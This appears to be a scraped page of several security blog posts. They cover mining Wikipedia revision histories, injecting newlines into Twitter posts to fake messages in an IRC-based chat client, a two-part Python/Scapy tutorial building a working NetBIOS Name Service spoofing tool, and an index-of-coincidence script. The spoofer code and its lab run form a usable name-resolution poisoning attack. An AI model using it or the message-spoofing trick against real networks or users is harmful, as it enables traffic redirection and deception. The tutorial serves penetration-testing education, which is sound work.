Wikipedia articles carry with them a revision history that logs every change made to an article, as well as information on the user or IP address that made the change. The revision history and user information can provide someone gathering intelligence with as much or more information about a topic than its article. Many Wikipedia editors are personally connected to the articles they edit, or otherwise have a stake in what is being said, and by processing the revision data, it’s possible to gain some insight into those connections.

This is somewhat awkward and time consuming to do through the web interface, so it helps to automate. I had a need to determine what revisions and users introduced certain phrases in an article, and wrote the following script to help:

To use, first export the article(s) you want to process to XML using Wikipedia’s Special:Export page (be sure to uncheck ”Include only the current revision”). Once you have the XML saved locally, usage is as follows:

./ <xml file> <word or phrase>

The output is comma-delimited and contains the Wikipedia timestamp, user information (username/id or IP address), and a link to the revision that introduced (or re-introduced) the phrase.

Hope this is of use to someone besides myself!


(so long as your target is using BitlBee ;) )

A few friends and I have been playing around with Twitter. I started using it to have a fun little place on my sidebar where I can paste stupid IRC quotes, fun links, and snarky comments about things. I wrote a bit of code so I could post to the Twitter thing on my sidebar from standard input on the command line (requires py-twitter):

import twitter
import sys

# Add your username and password here
user = "username"
pw = "password"

api = twitter.Api(username = user, password = pw)


When I tested this out, I inserted a newline (“\n”) into the input, in order to see if my sidebar would render it (it doesn’t). I didn’t think much more of this, until a friend on IRC pointed out that it did render the newline in the title area of the post in the Liferea RSS reader. This inspired me to see if Liferea would render a lot of newlines (it does), so I whipped up a quick message, posted it, and another friend on IRC pointed out how it affected his twitter-follower of choice, BitlBee:

20:47 <@cs_weasel> jgk: now that I think about it, I wonder *how* many newlines liferea will render in a title
20:51 < alindeman> (02:49:26) McGrewSecurity: l
20:51 < alindeman> (02:49:26) o
20:51 < alindeman> (02:49:26) '
20:51 < alindeman> (02:49:26) s
20:51 < alindeman> (02:49:26)
20:51 < alindeman> (02:49:26) o
20:51 < alindeman> (02:49:26) f
20:52 < alindeman> (02:49:26)
20:52 < alindeman> (02:49:26) n
20:52 < alindeman> (02:49:26) e
20:52 < alindeman> (02:49:26) w
20:52 < alindeman> (02:49:26) l
20:52 < alindeman> (02:49:26) i
20:52 < alindeman> (02:49:26) n
20:52 < alindeman> (02:49:26) e
20:52 < alindeman> (02:49:26) s
20:53 <@cs_weasel> lol
20:53 <@cs_weasel> i misspelled "lot's"
20:54 <@cs_weasel> alindeman's turns out to take some collatoral damage
20:54 < alindeman> You mean you misspelled "lots" ? ;-)
20:55 <@cs_weasel> yeah

My friend here uses BitlBee as his IM client, and has twitter updates sent to him on it via the Jabber/Google Talk interface. I thought for a moment… my friend subscribes to (and maintains automatically with some scripting) a twitter called “msstate” that aggregates all the news and such about the university…

20:55 <@cs_weasel> oh wait watch this
20:55 < alindeman> 140 new lines?
20:55 < alindeman> I bet there is some DoS potential
20:55 <@cs_weasel> no
20:56 < alindeman> OHHH NICE
20:56 < alindeman> DAMN, good call
20:56 <@cs_weasel> paste!
20:56 < alindeman> (02:55:49) McGrewSecurity: Another boring day
20:56 < alindeman> (02:55:49) msstate: MAROON ALERT world is ending MAROON ALERT
20:56 <@cs_weasel> :-D

This was done by sending “Another boring day\nmsstate: MAROON ALERT world is ending MAROON ALERT”.

This won’t work with most IM clients. It works with BitlBee since it uses IRC and breaks up newline’d text by making it a separate message. Still a lot of fun ;)

So, if you’re into whatever’s on my mind, mixed in with occasionally weird freakout messages like the above, check out the Twitter sidebar I have now on this site, follow me on from it, and add a feed of it to the software of your choice (if you’re brave ;) ).


This is the third and final post of a short series that demonstrate the creation of a simple security/penetration-testing application. The end-result is a simple NetBIOS Name Service spoofer, written in Python.

If you’re enjoying the packet analysis aspects of this, you might be interested in the SANS IP Packet Analysis course I’ll be teaching soon

In the previous post, we got nbnspoof to the point that it could sniff NetBIOS Name Service (NBNS) queries and responses, as well as a basic framework for the rest of the application. Today, I’m going to cover the additional steps we can take to make nbnspoof actually recognize when it should spoof a response, and craft the necessary packet to make the victim associate a given name with an IP address of our choice. This should conclude this series for the most part (although I may revisit it later if something interesting comes up).

If you want to follow along with the code, or just want to go ahead and start using nbnspoof (it’s in pretty good shape right now), here’s the current code:

First, let’s discuss some of the changes that were made to the last entry’s code. Most notable is the fact that we’ve changed some of the variables to be global:

global verbose
global regexp
global ip
global interface
global mac_addr

The reason for this change is that our get_packet() function will need to use this information, however the sniff() function does not pass the above data to get_packet() as an argument. The easiest solution to this was to simply make these user-specified options global. You’ll notice the addition of the “mac_addr” variable. This is meant to specify what MAC address the spoofed responses should have their source set as. There is also a command-line option added for this, and the usage() text reflects this:

-m The source MAC address for spoofed responses

I have decided to make this a required option, rather than defaulting to the actual MAC address of the interface. I believe that if one wants to use the actual MAC address, that should be a conscious decision. Typically, you would want this to reflect the address of the host on the local network that you are directing the victim to with your spoofing (if it is on the local network) or perhaps the gateway (if it’s outside the local network).

You’ll remember from the previous post that Scapy was dissecting NBNS responses as queries with some raw data stuck on the end. Because of this, we’ll be doing the packing and unpacking of IP addresses for responses ourselves. Here’s the code for that:

def pack_ip(addr):
   temp = IP(src=addr)
   return str(temp)[0x0c:0x10]

def unpack_ip(bin):
   temp = IP()
   temp = str(temp)[:0x0c] + bin + str(temp)[0x10:]
   temp = IP(temp)
   return temp.src

You’ll notice that these two functions leverage Scapy’s ability to pack and unpack IP addresses by crafting an IP packet in memory and setting or reading its source address. This wouldn’t have been hard to do ourselves (it’s just four bytes, each representing a number in the dotted-quad format), but it seems cleaner to let Scapy do it for us, even if it is a bit of a hack. It’s nice how Scapy can go back and forth between using attributes of packets and binary string representations so easily. One benefit of this is that if, for whatever reason, one wanted to supply a domain name instead of an IP address for the -h option, Scapy would do the lookup and conversion to IP address for us.

Another issue we glossed over yesterday was how we were going to match queries with the regular expression the user provides. We compile the regular expression in main() so we don’t have to do it for each query:

 regexp = re.compile(name_regexp,re.IGNORECASE)

Note that, since NetBIOS names are always going to be uppercase, we have specified the IGNORECASE option, so that the user-supplied regular expressions are case-insensitive. In our get_packet() function, we kick off the code block to craft fake NBNS responses with this test:

   if query and regexp.match(pkt.QUESTION_NAME.rstrip(),1):

The .rstrip() function of strings in Python removes the trailing whitespace (remember that the names in NBNS packets are padded out to 15 characters). So, if the current packet is a query, and matches the regexp the user provided, we can move on to crafting and sending a response:

      response  = Ether(dst=pkt.src,src=mac_addr)
      response /= IP(dst=pkt.getlayer(IP).src,src=ip)
      response /= UDP(sport=137,dport=137)

One neat thing about Scapy is that it overloads the division operator (‘/’) for packets to make it a sort of concatenation/layering operator. Here we craft our response packet by giving it an Ethernet header, then tacking IP and UDP headers onto the end of it. The destination MAC and IP addresses are set to the source of the sniffed packet, and the source MAC and IP are set to the information supplied by the user. Next, we get into the creation of the NBNS section of the packet, starting with the information that Scapy can deal with:

response /= NBNSQueryRequest(NAME_TRN_ID=pkt.getlayer(NBNSQueryRequest).NAME_TRN_ID,\

This monster function call adds in a “NBNSQueryRequest” layer, and the arguments specify all the information needed to make this into a response. You’ll notice that the options we’re setting to actual values, we’re using the values from the response packet we sniffed in the first part of this series. The other options are being set from the corresponding information from the sniffed request, such as the transaction ID and name. An NBNS response requires some more data than just this, and Scapy won’t handle the rest for us, so we’ll add it to the packet as a “Raw” payload and pack it in ourselves:

response /= Raw()
# Time to live: 3 days, 11 hours, 20 minutes
response.getlayer(Raw).load += '\\x00\\x04\\x93\\xe0'
# Data length: 6
response.getlayer(Raw).load += '\\x00\\x06'
# Flags: (B-node, unique)
response.getlayer(Raw).load += '\\x00\\x00'
# The IP we're giving them:
response.getlayer(Raw).load += pack_ip(ip)

I’ve separated this part out by field, and commented them based on how they’re named in Wireshark’s dissection, so that it’s not just one incomprehensible string of data. Something you want to pay attention to is that “Time to Live” field. I’m not sure how long Windows will really let you cache one of these responses, but this would be something to modify if you’re into playing around with this script. The time that’s hard-coded seems to be what Windows XP likes to hand out with its responses, though.

Finally, after packing in the last field, which is the IP address we’re making the name resolve to, we send the packet on its way:

      if verbose:
         print 'Sent spoofed reply to #' + str(response.getlayer(NBNSQueryRequest).NAME_TRN_ID)

We specify the interface, and tell it to silence sendp’s visual confirmation of packet sending. If the user wanted verbose output, we print out a message saying that we spoofed a reply to the request with a specific transaction ID. The response we sent will be picked up by sniff() as well, so it will be displayed with a dissection as well in verbose mode.

That’s it! It works! Let’s see how it looks when we run it:

$ sudo ./ -v -i vmnet8 -n ".*\..*" -h -m 00:0c:29:27:be:ef
32949: Q SRC: DST: NAME:"HELLO.WOR      "
Sent spoofed reply to #32949
32949: R SRC: DST: NAME:"HELLO.WOR      " IP:
32950: Q SRC: DST: NAME:"XPPROTEST2     "
32950: R SRC: DST: NAME:"XPPROTEST2     " IP:

In this test run, on the VMWare network between the host Linux machine ( and the two Windows VMs (.132 and .133), I ran nbnspoof in verbose mode, set with a regular expression to only spoof responses for names that contain a period (‘.’). This is a quick-hack way of catching mistyped domain names and such, while letting most legitimate request local network systems go. I specified the Linux host for the IP address, and a silly MAC address with a VMWare vendor prefix. From “xpprotest”, I first pinged “hello.wor” which nbnspoof matched and spoofed for me, and then I pinged “xpprotest2″ which is (correctly) ignored.

So that settles it. We now have a nice tool for demonstrating how Windows name resolution can be spoofed in certain situations. More importantly, I hope some people have learned a bit about Scapy and the sort of procedure one might follow in developing a simple penetration testing application like this. Hopefully, this will be something you can apply to many situations :) .


This is the second post of a short series of entries that demonstrate the creation of a simple security/penetration-testing application. The end-result will be a simple NetBIOS Name Service spoofer, written in Python.

If you’re enjoying the packet analysis aspects of this, you might be interested in the SANS IP Packet Analysis course I’ll be teaching soon

In the previous part of this series, we took a look at the NetBIOS Name Service (NBNS) query and response packets in order to get an idea of what we would need to do to craft our spoofed responses. Today, we’re actually going to start writing some code, with the goal being to get a basic skeleton of our spoofer up and running. At the end of this part, we’ll have nbnspoof to the point that it’ll sniff for, dissect, and display NBNS queries and responses,

If you’re following along at home, the only requirements for the code is a working installation of Python and the excellent packet manipulation library Scapy. Scapy may be in your operating system’s repositories (it is for Ubuntu at least). If it’s not, it shouldn’t be too difficult to install by hand, following the instructions on the Scapy homepage. The code we’re looking at today is available at:

One thing that we want to do before we start coding is to see how Scapy decodes these NBNS packets. Scapy has an interactive mode that gives you access to a python interpreter and all of the scapy functionality, so we can use it to look at one of our packet dumps from yesterday:

weasel@hacktop:~/Desktop/nbnspoof$ scapy
Welcome to Scapy (
>>> pkts = rdpcap("ping_with_nbns_response.pcap")
>>> pkts
<ping_with_nbns_response.pcap: ICMP:8 UDP:6 TCP:0 Other:4>
0000 Ether / ARP who has says
0001 Ether / ARP is at 00:50:56:e8:0b:97 says
0002 Ether / IP / UDP / DNS Qry "xpprotest2.localdomain."
0003 Ether / IP / UDP / DNS Ans
0004 Ether / IP / UDP / DNS Qry "xpprotest2.localdomain."
0005 Ether / IP / UDP / DNS Ans
0006 Ether / IP / UDP > / NBNSQueryRequest
0007 Ether / ARP who has says
0008 Ether / ARP is at 00:0c:29:27:b9:f0 says
0009 Ether / IP / UDP > / NBNSQueryRequest / Raw
0010 Ether / IP / ICMP > echo-request 0 / Raw
0011 Ether / IP / ICMP > echo-reply 0 / Raw
0012 Ether / IP / ICMP > echo-request 0 / Raw
0013 Ether / IP / ICMP > echo-reply 0 / Raw
0014 Ether / IP / ICMP > echo-request 0 / Raw
0015 Ether / IP / ICMP > echo-reply 0 / Raw
0016 Ether / IP / ICMP > echo-request 0 / Raw
0017 Ether / IP / ICMP > echo-reply 0 / Raw

In the above session, I started Scapy, loaded a list of packets from a pcap dump, showed a summary of the number of packets of each type, and then listed a summary of each packet in the dump. From the looks of the output, it seems that packet 6 is the NBNS query, and packet 9 is the result. Let’s take a close look at those:

>>> pkts[6]
<Ether  dst=ff:ff:ff:ff:ff:ff src=00:0c:29:27:b9:f0 type=IPv4 |
<IP  version=4L ihl=5L tos=0x0 len=78 id=64 flags=
frag=0L ttl=128 proto=UDP chksum=0x6eb9 src=
dst= options='' |<UDP  sport=netbios-ns
dport=netbios-ns len=58 chksum=0x5224 |<NBNSQueryRequest
>>> pkts[9]
<Ether  dst=00:0c:29:27:b9:f0 src=00:0c:29:03:ad:f7 type=IPv4 |
<IP  version=4L ihl=5L tos=0x0 len=90 id=35 flags= frag=0L
ttl=128 proto=UDP chksum=0x6f45 src=
dst= options='' |<UDP  sport=netbios-ns
dport=netbios-ns len=70 chksum=0xd516 |<NBNSQueryRequest
<Raw  load='\x00\x04\x93\xe0\x00\x06\x00\x00\xac\x10\xb9\x84' |>>>>>

From the above, Scapy appears to recognize and dissect the packets (which are the same packet we looked at in Part 1 in Wireshark) fairly well. It looks like we’ll have to mask out bits in the “FLAG” field ourselves, but that’s not a big deal. Also, you’ll notice that the response is the same thing as a query basically, with the actual “answer”, including the IP address, tacked on at the end in the “Raw load” layer. This means that when we build our responses up in our code, we’ll have to handle all the fields in this section ourselves, which won’t be hard. We can use Wireshark as a reference to see how it is dissected/crafted.

One nice thing we can observe from what Scapy has done with these packets is that it has the ability to decode and encode the names from that crazy encoding scheme we saw in the previous post. That’ll save us some headaches and effort. This encoding is called “First Level Encoding”, and was created in some sort of attempt at getting NetBIOS to play nice with DNS. It involves taking each byte of the name, splitting apart the upper and lower 4 bits, and adding each 4 bits to the letter ‘A’ in hex. It’s not too complex, but it’s nice that we won’t have to deal with it in our code :) .

Speaking of code, we’re at a place that we can start writing some. For larger projects you’ll want some sort of requirements and/or design documents to help guide your process, but this is going to be a very simple program. Even in its simplicity, however, you want some sort of guideline for how you want your program to operate. In this case, I want the ability to tie nbnspoof to an interface, have it listen for any NBNS queries for names matching a regular expression, and craft responses to these queries that points them to a given IP address.

Given this information, I want to write the “usage” text for the program first, so I have some reminder of how it should behave. This will be what is displayed if someone runs nbnspoof with zero or invalid arguments. This may change in the development of the program, but here’s what we’re starting with:

def usage():
   print """Usage: [-v] -i <interface> -n <regexp> -h <ip address>

-v Verbose output of sniffed NBNS name queries, and responses sent

-i The interface you want to sniff and send on

-n A regular expression applied to each query to determine whether a
   spoofed response will be sent

-h The IP address that will be sent in spoofed responses

(I’ll be skipping around in the code, so if you’re hardcore into this or have questions, you may want to follow along in the source code itself to see what I’m skipping)

So we have three required arguments (they’re in angle braces): an interface to listen and inject on, a regular expression for names to match, and an IP address to send in the responses. There is a single optional argument, in square brackets, that specifies whether or not we want “verbose” output. The verbose output will include a summary of NBNS requests and queries as they are sniffed, as well as notification of what packets it has crafted and sent off.

To parse these arguments taken in from the command line, we use Python’s “getopt” module in the following code:

def main():
   global verbose
      opts, args = getopt.getopt(sys.argv[1:],"vi:n:h:")

   verbose = False
   interface = None
   name_regexp = None
   ip = None

   for o, a in opts:
      if o == '-v':
         verbose = True
      if o == '-i':
         interface = a
      if o == '-n':
         name_regexp = a
      if o == '-h':
         ip = a

   if args or not ip  or not name_regexp or not interface:

It’s fairly simple. The list of arguments passed from the shell is given to getopts, with a format string to tell it what options to look for, and which ones have arguments (designated by a colon after the letter). If this throws an exception (usually because the user didn’t supply any arguments), the usage text is displayed and the program exits.

After declaring our variables with default values, we go into an interesting loop. “opts” holds an array of tuples, each one containing an option and its argument. For each, we test to see if it’s one we know and care about, and set up our variables with that option’s argument. After we’re finished doing that, we check to see if any of our required options were not given, and whether or not we have any extra arguments left over. If anything seems fishy, we remind the user of the usage() and exit.

All of this required a bit of effort, and makes up what will be a good chunk of our code, but it helps the program look professional. A penetration tester of any skill should be able to pick it up and figure out how to use this in a fairly short amount of time.

With the preliminaries and preparation out of the way, we can get down to some serious network business! You really won’t believe how easy it is to set up a sniffer using the Scapy library. Here we go:

   sniff(iface=interface,filter="udp and port 137",store=0,prn=get_packet)

Wow, huh? It’s pretty self explanatory, but here we go: First, we tell it what interface to sniff and inject on, based on what the user told us (eth0, eth1, etc). Next, we have a BPF filter that tells the libpcap library to only send us UDP packets that involve port 137. This is for the sake of performance, and to prevent cases where Scapy might accidentally identify something on another port as being NBNS traffic (Perhaps someone trying to detect a user of nbnspoof would craft NBNS packets on another port to see if the nbnspoof user would respond when a Windows machine wouldn’t). The “store” argument is set to zero, because once we’ve dealt with each packet, we’re going to throw it away. Otherwise, the sniff function will store and return a list of packets, which would waste memory, as we won’t be using it.

Finally, the “prn” argument is set to get_packet. “prn” allows you to set a “call-back” function. What this means, is that for every packet that sniff() sees, it will pass that packet to the call-back function. Here, we have set it to get_packet, which is our function for dissecting, displaying, and crafting packets based off the NBNS queries we see. This function is where most of the real work of nbnspoof will be done. Let’s take a look at it is working so far:

def get_packet(pkt):
   if not pkt.getlayer(NBNSQueryRequest):

   if pkt.FLAGS & 0x8000:
      query = False
      ip = ''
      query = True

First off, we see if the packet has the “NBNSQueryRequest” layer, as far as Scapy is concerned. This will help us weed out anything that might show up on this port that isn’t NBNS related. Remember, that Scapy sees NBNS response packets the same way, so both queries and results will pass this test.

Next, we test the FLAGS section of the NBNS data to see if this packet is a query or request, we do this by testing to see if the flags, logically AND’d with 0×8000 (binary: 1000000000000000) is true or not. If the bit is set, then it is a response. Now, for the sake of the “verbose” option, we would want to decode from the packet what IP address this response would be. Right now, we don’t have this code in place, so we’re just putting in ’′ as a placeholder. If the bit isn’t set, then it’s a query.

   if verbose:
      print str(pkt.NAME_TRN_ID) + ":",
      if query:
         print "Q",
         print "R",
      print "SRC:" + pkt.getlayer(IP).src + " DST:" + pkt.getlayer(IP).dst,
      if query:
         print 'NAME:"' + pkt.QUESTION_NAME + '"'
         print 'NAME:"' + pkt.QUESTION_NAME + '"',
         print 'IP:' + ip

If we have the “verbose” option set, we want to display a summary of the current packet. This includes the transaction ID that uniquely pairs a question and response, the status of it being a query or response, source and destination IPs, and what name is being looked up. Now that we’ve covered what we have of the code so far, let’s use it to watch NBNS traffic between two Windows VMs:

weasel@hacktop:~/Desktop/nbnspoof$ sudo ./ -v -i vmnet8 -n unused -h unused
32878: Q SRC: DST: NAME:"XPPROTEST2     "
32878: R SRC: DST: NAME:"XPPROTEST2     " IP:

You’ll notice that even though we’re not doing anything with the regexp or IP address, we still need to specify them to get past our own checks :) . The above output is from pinging from “xpprotest” to “xpprotest2″, and then attempting to ping “example.cpm”. Some things to note:

  • Transaction IDs for NBNS seem to be sequential! Stick that in your pocket for the next time you’re doing passive profiling/fingerprinting. Maybe I should try sniffing a machine as it boots up to see if it always starts at the same number.
  • The name is always going to be 15 characters, all caps, padded out with spaces. This has to do with the encoding of the name in these NBNS packets, rather than a limitation of our script or Scapy. If a host tries to resolve a non-existent name that’s longer than this, it doesn’t try NBNS, so this’ll limit what names we can spoof for.

I hope you enjoyed this! The next part will take us through matching names we want to spoof for, dissecting and crafting response packets, and sending them to the machines that broadcast the queries.


Have you ever worked an exercise for a class, or studied a topic, only to pick up one little trick or technique that made the entire activity worth it? In one way, I guess it could be considered as missing the point, but any time you wind up taking something useful away from an activity, I think it’s worth it.

Index of Coincidence is one of those things for me. In a cryptography class, we were tasked with cracking a message encrypted in a Vigenere cipher. A Vigenere cipher is implemented as a series of Caesar ciphers. A Caesar cipher is your typical grade-school shifting of letters (A becomes C, B becomes D, etc.). With Vigenere, rather than having one shift (2 in the previous sentence’s example), we have a series of shifts that we cycle through. The first step of breaking a Vigenere cipher is to figure out how many shifts have been implemented. A property of text known as “index of coincidence” is used to determine this.

And it’s so useful for other things! The idea is, take your data, be it alphabetic characters, bytes, whatever, and shift it by a certain amount (wrapping back around from the tail to the head). Then, compare it with the original, count how many times the two match, and figure it up as a percentage of the entire set of data. For example:

Take your data be it alphabetic characters, bytes, whatever, and shift it
data be it alphabetic characters, bytes, whatever, and shift it Take your
 *  *      *                *                  * **         *
8/73 = 0.109589041

So in this example, the Index of Coincidence (IOC) is about 11 percent. Typically, English text has an IOC of about 6.69 percent, although this is over a larger chunk of text (smaller examples like this will be all over the map). Other languages have distinctive IOC’s as well.

What’s really cool about this, is that it’s a good “rule of thumb” measure of how random or uniform a set of data is. Random data should have very low IOC, while something completely uniform will tend to be closer to 1.0, or 100%. Why is this cool? Good encryption should result in cyphertext that is almost indiscernable from random data. Good compression algorithms should also recognize patterns in data and result in very non-uniform data. So when we’re doing analysis of a piece of malware, for example, if we suspect that the sample is encrypted or compressed in some way, we can test that hypothesis.

This is actually a lot more accurate than “eyeballing” it. Take a hex editor to the “grep” binary and unless you understand machine code, it’s going to look pretty incomprehensible, and if you didn’t know better, random. Let’s compare it with real random data, using a script I’m about to show you:

$ ls -al grep
-rwxr-xr-x 1 weasel weasel 96176 2007-03-01 19:54 grep
$ dd if=/dev/urandom of=rand bs=96176 count=1
1+0 records in
1+0 records out
96176 bytes (96 kB) copied, 0.116349 seconds, 827 kB/s
$ ./ grep 5
$ ./ rand 5

So here (shifting by five) we see that the grep binary has an IOC of about 7 percent, while the chunk of random data we generated has an IOC of about 0.3 percent. What happens if we gzip the grep binary to compress it? :

$ gzip grep
$ ls -al grep.gz
-rwxr-xr-x 1 weasel weasel 47446 2007-03-01 19:54 grep.gz
$ ./ grep.gz 5

Wow! Down to 0.5 percent! How can we use this?

  • Reverse engineering binary data formats – See if we’re going to have to go through a layer of compression
  • Is this piece of malware encrypted and using a loader?
  • Looking at a dump of packet data payloads to see if a protocol is likely encrypted or compressed in some way
  • Identifying plain English text (and other languages!) in an automated fashion!

Some things to think about and play with:

  • Would it be useful to apply this to opcodes in executable binaries?
  • Could you identify potential areas of interest for data carving out of huge image files in forensics/data recovery?
    • Build a database of common file types and their usual IOC?

So here’s some code. Written in Python, like most of what I put together for quick and dirty situations like this. You can run it from the shell, passing a filename and a number to shift by (in most cases, it shouldn’t really matter what number you pick), and it’ll return the IOC as a floating point number between 0 and 1. You can also import it into your own Python script, or the interactive Ipython shell and pass data to the calculate_ioc function directly. The main caveat is to remember that this is reading the entire file into memory in one shot, so you might want to roll your own code for this if you’re doing it on something huge.

#!/usr/bin/env python

import sys

def calculate_ioc(data, shift=1):
    match = 0
    for i in range(0, len(data)):
        j = (i + shift) % len(data)
        if data[i] == data[j]:
            match += 1
    ioc = (float(match)/float(len(data)))
    return ioc

if __name__ == "__main__":
    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print 'Usage: ' + sys.argv[0] + '  [shift]'

        fp = open(sys.argv[1],'r')
        print 'Could not open ' + sys.argv[1]

    data =

    if len(sys.argv) == 3:
        shift = int(sys.argv[2])
        shift = 1

    print calculate_ioc(data, shift)

Enjoy! It’s also available here for your right-click-saving pleasure.

For further reference, the wikipedia page for Index of Coincidence should be useful, if it hasn’t been taken over by roving bands of cryptology trolls, as well as a little googling.

© 2012 McGrew Security Suffusion theme by Sayontan Sinha